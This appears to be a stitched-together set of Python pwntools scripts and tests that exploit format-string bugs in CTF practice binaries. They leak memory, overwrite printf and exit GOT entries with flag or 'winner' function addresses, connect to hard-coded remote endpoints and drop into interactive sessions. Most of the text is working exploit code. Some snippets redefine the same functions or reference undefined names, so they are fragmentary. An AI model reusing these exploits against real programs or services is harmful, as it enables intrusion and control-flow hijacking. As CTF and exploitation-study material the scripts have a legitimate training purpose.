def test_win():
    """Integration test: redirect the GOT entry of printf and check the flag marker appears.

    Depends on module-level names defined elsewhere in the file: ``connect``,
    ``exec_fmt``, ``elf`` and the process handle ``p`` that ``connect`` publishes.
    """
    # Address hard-coded for the original build of the target; it will not match a
    # rebuilt binary, so treat it as a fixture of this example rather than a constant.
    winner = 0x4008DA

    connect()

    # index/pad are fixed and explore_stack is off, so the helper is not probing the
    # stack itself here -- presumably these were determined beforehand; confirm if the
    # test starts failing after a rebuild.
    fmtStr = FormatString(exec_fmt,
                          elf=elf,
                          index=6,
                          pad=0,
                          explore_stack=False)

    # write_q -- name suggests an 8-byte write; verify in FormatString.
    fmtStr.write_q(elf.symbols['got.printf'], winner)

    p.sendline("2")
    p.sendline("")
    out = p.recvline()
    # NOTE(review): on Python 3 pwntools returns bytes here, and a str-in-bytes test
    # raises TypeError; this example appears to be written for Python 2.
    assert "This_is_the_flag" in out
def startIt():
    """Spawn a fresh target process and build the FormatString helper around ``exec_fmt``.

    Publishes both ``p`` and ``fmtStr`` as module globals for the callers.
    ``SCRIPTDIR``, ``fName``, ``exec_fmt`` and ``elf`` must already be defined.
    """
    global p
    global fmtStr
    # buffer_fill_size=0xffff -- presumably to read large replies in one go; confirm in pwntools docs.
    p = process(os.path.join(SCRIPTDIR, fName), buffer_fill_size=0xffff)
    # Consume the prompt so the next sendline lands in the program's input read.
    p.recvuntil("Input: ")
    fmtStr = FormatString(exec_fmt, elf=elf)
import IPython
import logging

# Module-level setup: debug-level logging and the ELF handle shared by exec_fmt below.
logging.basicConfig(level=logging.DEBUG)
log = logging.getLogger()

# Target binary, resolved relative to the current working directory at run time.
fName = "./deardiary"

elf = ELF(fName)


# For deardiary
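def exec_fmt(s):
    """FormatString driver for deardiary: feed ``s`` to a fresh process and return what it prints back.

    The spawned process is published as the module global ``p``. The menu
    interaction appears to be: option "1" stores ``s``, option "2" prints it
    back (inferred from the prompts; confirm against the binary). The process
    is closed in a ``finally`` block so a failed recv does not leave a child
    process behind -- the original only closed it on the success path.

    Returns:
        The data read between the ">" prompt and the "1." menu marker.
    """
    global p
    p = process(fName, buffer_fill_size=0xffff)
    try:
        p.recvuntil("quit")
        p.sendline("1")
        p.sendline(s)
        p.recvuntil("quit")
        p.sendline("2")
        p.recvuntil(">")
        # drop=True strips the "1." marker from the returned data.
        out = p.recvuntil("1.", drop=True)
        p.recvuntil("quit")
    finally:
        p.close()
    return out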


# Build the helper around exec_fmt; with no index/pad given it presumably probes the
# stack itself on construction -- confirm in FormatString.
fmtStr = FormatString(exec_fmt, elf=elf)

# leak.s -- name suggests a NUL-terminated string read at the 'data' symbol.
print(fmtStr.leak.s(elf.symbols['data']))
# Let pwntools derive arch/bits/endianness from the loaded ELF instead of hard-coding them.
context.binary = elf


def connect():
    """Start the target binary locally and publish the handle as the module global ``p``.

    Consumes the initial banner up to the "Exit the battle" menu line so the
    first sendline hits the menu read. A remote variant is left commented out.
    """
    global p
    p = process(elf.file.name)
    #p = remote("146.185.132.36",19153)
    p.recvuntil("Exit the battle \n")


def exec_fmt(s):
    """FormatString driver: select menu option "2", send ``s`` and return the program's reply.

    Reuses the module global ``p`` opened by ``connect`` rather than spawning a
    process per call, so the menu must be back at its top level on return.

    Returns:
        The output read up to (and excluding) the "1. Stack Bufferoverflow Bug" menu line.
    """
    print("Sending: " + repr(s))
    p.sendline("2")
    # Short pause before sending -- presumably to let the menu handler read the
    # option first; no comment in the original explains the value.
    sleep(0.1)
    p.sendline(s)
    ret = p.recvuntil("1. Stack Bufferoverflow Bug", drop=True)
    # Drain the rest of the menu so the next call starts from a clean prompt.
    p.recvuntil("Exit the battle \n")
    return ret


# Address hard-coded for the original build of the target; not valid for a rebuilt binary.
winner = 0x4008DA

connect()

# Fixed index/pad and no stack exploration: the parameters are assumed to be known
# for this binary -- confirm if the write stops landing.
fmtStr = FormatString(exec_fmt, elf=elf, index=6, pad=0, explore_stack=False)

# Writes `winner` into the GOT slot for printf (write_q -- name suggests an 8-byte write).
fmtStr.write_q(elf.symbols['got.printf'], winner)

# Trigger menu option 2 once more and hand the session to the user.
p.sendline("2")
p.interactive()
def test_it():
    """Check that the helper reads the expected values at two symbols of the target.

    Uses ``fmtStr[addr]`` indexing, whose return type is not visible here; the
    comparisons against str/"\\x00" suggest a Python 2 (str) API -- TODO confirm.
    """
    fmtStr = FormatString(exec_fmt, elf=elf)
    assert fmtStr[elf.symbols['secret']] == 'This is my super secret string!'
    assert fmtStr[elf.symbols['loggedIn']] == "\x00"
#!/usr/bin/env python

from formatStringExploiter.FormatString import FormatString
from pwn import *


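def exec_fmt(s, echo=True):
    """FormatString driver for ./hacker_level: send ``s`` once and return what follows "Hello, ".

    A new process is spawned per call. It is closed in a ``finally`` block so a
    failed recv does not leak the child process (the original only closed it on
    the success path).

    Args:
        s: the input line to send.
        echo: when True, print the captured output for diagnostics.

    Returns:
        Everything the program printed after "Hello, " until it exited.
    """
    #  Open up pwntool process class to interact with application
    p = process("./hacker_level", buffer_fill_size=0xffff)
    try:
        # Go ahead and send our input
        p.sendline(s)
        # Throw out data that we know to be before our results
        p.recvuntil("Hello, ", drop=True)
        # We could do better here, but why? Just grab all the rest of the data.
        out = p.recvall()
        # For diagnostic reasons, we can print out the output
        if echo:
            print(out)
    finally:
        # Since we're running this every time, close out the proc.
        p.close()
    return out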


elf = ELF("./hacker_level")

# No index/pad given: the helper presumably works them out itself -- confirm in FormatString.
fmtStr = FormatString(exec_fmt, elf=elf)

# write_d -- name suggests a 4-byte write of the constant into the 'level' symbol.
fmtStr.write_d(elf.symbols['level'], 0xCCC31337)

# print elf

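# Show the address of exit's GOT entry; get_secret is hard-coded for the original build
# of the target and will not match a rebuilt binary.
print(hex(elf.got['exit']))
get_secret = 0x08048713
# print() works on both Python 2 and 3; the bare print statement used here before was
# Python 2 only and inconsistent with the print() call two lines up.
print(hex(get_secret))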


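def exec_fmt(s):
    """FormatString driver: run ``s`` through the target and return the text echoed before "\\n\\nTada!".

    The program asks for a password before and after the probed input; the
    placeholder value below is what the original example used. The child
    process is closed in a ``finally`` block so an unexpected prompt does not
    leave it running (the original never closed it).

    Returns:
        The data read up to (and excluding) the "\\n\\nTada!" marker.
    """
    p = elf.process()
    # p =remote('problem1.tjctf.org',8008)
    try:
        p.recv()
        password = '******'
        p.sendline(password)
        p.recv()

        p.sendline(s)
        p.recvuntil('> ', drop=True)
        p.sendline(password)
        out = p.recvuntil('\n\nTada!', drop=True)
        # print() form: the bare print statement was a SyntaxError on Python 3.
        print(p.recvall())
    finally:
        p.close()
    return out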

# explore_stack=False: no stack probing on construction -- the index is presumably
# determined by the helper some other way; confirm in FormatString.
fmtStr = FormatString(exec_fmt,elf=elf, explore_stack=False)

# fmtStr.printStack()
# 65537 == 0x10001; the reason for the offset on get_secret is not visible here
# (the same offset appears in the './secure' example) -- verify against the write-up.
fmtStr.write_d(elf.got['exit'], get_secret + 65537)
#!/usr/bin/env python

from formatStringExploiter.FormatString import FormatString
from pwn import *
import IPython


def exec_fmt(s):
    """FormatString driver for ./fermat: pass ``s`` as argv[1] and return everything the program prints.

    The process is published as the module global ``p`` and is not closed here,
    so the caller owns its lifetime.
    """
    global p
    print("executing: " + repr(s))
    #  Open up pwntool process class to interact with application
    # Input goes in on the command line rather than stdin for this target.
    p = process(["./fermat", s], buffer_fill_size=0xffff)
    # Get the output
    out = p.recvall()
    return out


elf = ELF("./fermat")

fmtStr = FormatString(exec_fmt, elf=elf)

# write_word -- name suggests a 2-byte write; 0x539 == 1337.
fmtStr.write_word(elf.symbols['secret'], 0x539)

# Drop into an interactive shell with the helper and `p` in scope for manual inspection.
IPython.embed()
def test_it():
    """Check the helper's leak primitives at two symbols of the target.

    ``leak.s`` is compared against bytes and ``leak.b`` against an int, so this
    variant is the Python 3 form of the same test found earlier in the file.
    """
    fmtStr = FormatString(exec_fmt, elf=elf)
    assert fmtStr.leak.s(
        elf.symbols['secret']) == b'This is my super secret string!'
    assert fmtStr.leak.b(elf.symbols['loggedIn']) == 0
from formatStringExploiter.FormatString import FormatString

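elf = ELF('./secure')

# Show the address of exit's GOT entry; get_secret is hard-coded for the original build
# of the target and will not match a rebuilt binary.
print(hex(elf.got['exit']))
get_secret = 0x08048713
# print() works on both Python 2 and 3; the bare print statement used here before was
# Python 2 only and inconsistent with the print() call two lines up.
print(hex(get_secret))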


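def exec_fmt(s):
    """FormatString driver for ./secure: run ``s`` through the target and return the text echoed before "\\n\\nTada!".

    The program asks for a password before and after the probed input; the
    placeholder value below is what the original example used. The child
    process is closed in a ``finally`` block so an unexpected prompt does not
    leave it running (the original never closed it).

    Returns:
        The data read up to (and excluding) the "\\n\\nTada!" marker.
    """
    p = elf.process()
    print("executing: " + repr(s))
    # p = remote('problem1.tjctf.org',8008)
    try:
        p.recv()
        password = '******'
        p.sendline(password)
        p.recv()

        p.sendline(s)
        p.recvuntil('> ', drop=True)
        p.sendline(password)
        out = p.recvuntil('\n\nTada!', drop=True)
        # print() form: the bare print statement was a SyntaxError on Python 3.
        print(p.recvall())
    finally:
        p.close()
    return out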


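# explore_stack=False: no stack probing on construction -- confirm in FormatString how
# the index is chosen in that case.
fmtStr = FormatString(exec_fmt, elf=elf, explore_stack=False)

# print() form works on Python 2 and 3; the bare print statement was Python 2 only.
# The 0x10001 offset on get_secret is not explained on this page -- verify against the write-up.
print(fmtStr.write_d(elf.got['exit'], get_secret + 0x10001))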
#p=process('mary_morton')
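# Session setup for the mary_morton example: the remote endpoint, ELF handles and the
# hard-coded target address all come from the original write-up and are specific to
# that build/instance.
p = remote("111.198.29.45", 44435)
elf = ELF('mary_morton')
libc = ELF('libc-2.23.so')
context.clear(arch='amd64')
taraddr = 0x4008da
print_addr = elf.got['printf']
# print() form works on Python 2 and 3; the bare print statements were Python 2 only.
print("printf_addr:" + hex(print_addr))
print(p.recv())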


def exec_fmt(s):
    """FormatString driver: select menu option '2' on the shared session ``p``, send ``s`` and return the reply.

    Returns:
        The output read up to (and excluding) the '1. ' menu marker.
    """
    p.sendline('2')
    # Short pause before sending the payload -- presumably to let the menu read
    # the option first; the original gives no rationale for the value.
    sleep(0.1)
    p.sendline(s)
    ret = p.recvuntil('1. ', drop=True)
    return ret


#print fmt('aaaa')

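# index=6 is fixed for this binary; confirm if the write stops landing after a rebuild.
fmt = FormatString(exec_fmt, elf=elf, index=6)
# write_qword -- 8-byte write of taraddr into printf's GOT slot.
fmt.write_qword(print_addr, taraddr)
# print() form works on Python 2 and 3; the bare print statement was Python 2 only.
print(p.recv())
p.sendline('1')

p.interactive()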

#print offset
def remote_atk(pl):
    """Send ``pl`` as the name input to the remote instance and hand the session to the user.

    The endpoint is hard-coded from the original write-up. The ``with`` block
    closes the connection when interactive() returns.
    """
    with remote('163.172.176.29', 9035) as p:
        p.recvuntil('pwner, whats your name?\n')
        p.sendline(pl)
        p.recvuntil('Till then Bye')
        p.interactive()

    #fmtStr = FormatString(exec_fmt, elf=elf)
    # index = 10
    # pad = 0
    # {'max_explore': 64, 'already_written': 1, 'index': 10, 'arch': 'i386', 'bad_chars': '\n', 'elf': ELF('/media/sd128/sdcard/ctf/backdoor/32_new'), 'leak': pwnlib.memleak.MemLeak(<bound method FormatString._leak of <formatStringExploiter.FormatString.FormatString instance at 0x7f9a4db16bd8>>, search_range=20, reraise=True), 'pad': 0, 'endian': 'little', 'padChar': 'C', 'bits': 32, 'stack': [0, 134514964, 4287639208, 1, 4148418072, 878, 4148127336, 4288161396, 4294223700, 4294281328, 1246382666, 607203621, 1246382704, 134220362, 4148590104, 725871085, 4147803752, 4148010770, 22683471, 4291817104, 4292129648, 878, 4151142496, 0, 4294967295, 4151212128, 4149479868, 4151994464, 0, 0, 6, 4151131424, 4152049433, 0, 4152130256, 4292899208, 4290620128, 4151290523, 134513148, 4293949144, 4151720564, 2, 4152046640, 1, 0, 1, 4152199448, 4151566800, 4151689224, 4151902848, 4151410696, 4294738648, 4151880780, 4151888258, 4151115784, 0, 4152123392, 4152051992, 4292519760, 134513630, 1663069007, 745303919, 1869574944, 1702305902], 'exec_fmt': <function exec_fmt at 0x7f9a50914230>}
    # print vars(fmtStr)


# 0x84a8751
# 0x804870b
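# Symbols resolved from the loaded ELF; the mangled name is the C++ function flag().
flag = elf.symbols['_Z4flagv']
#flag = 0x7be86c5
# 0x61a761a7
# print() form works on Python 2 and 3; the bare print statements were Python 2 only.
print(hex(flag))
exit_got = elf.symbols['got.exit']
print(hex(exit_got))
# NOTE(review): despite the name, this is the GOT entry for printf ('got.printf'), not a PLT stub.
printf_plt = elf.symbols['got.printf']
print(hex(printf_plt))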

#payload = fmtstr_payload(10, {exit_got: flag})
# attack(payload)

# `attack` is the driver callback here; it is not defined in this excerpt (only referenced
# in a commented-out call above), so this snippet is incomplete on its own.
payload = FormatString(attack, elf=elf, index=10, explore_stack=False)
# write_q -- name suggests an 8-byte write of `flag` into exit's GOT slot.
payload.write_q(exit_got, flag)